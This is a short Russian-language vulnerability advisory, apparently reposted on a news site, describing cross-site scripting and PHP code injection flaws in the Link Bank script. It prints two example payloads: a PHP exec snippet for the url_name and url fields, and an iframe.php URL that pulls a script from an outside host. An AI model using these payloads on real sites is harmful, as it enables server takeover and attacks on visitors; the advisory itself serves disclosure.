|
Навигация
|
Главная » Интернет Межсайтовый скриптинг и PHP-инклюдинг в Link BankПрограмма: Link Bank, возможно более ранние версии Опасность: Критическая Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольный PHP сценарий на системе. 1. Уязвимость существует из-за недостаточной обработки входных данных в параметрах url_name и url во время добавления ссылки. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP код на целевой системе с привилегиями Web сервера. Пример: <?php exec($cmd) ?> 2. Уязвимость существует из-за недостаточной обработки входных данных в параметре site сценария iframe.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: http://example.com/iframe.php?site=%3C/title%3E%3C/head %3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E URL производителя: daverave.64digits.com/index.php?page=linkbank Решение: Способов устранения уязвимости не существует в настоящее время. В чем суть Perl 6. CTI внедрила корпоративную систему IP-телефонии для Яндекса. Вышло обновление ICQ 5.1. Microsoft проиграла битву против IBM и Sun. Российские ученые направили письмо Путину о запрете зарубежного ПО. Главная » Интернет |
© 2024 Team.Furia.Ru.
Частичное копирование материалов разрешено. |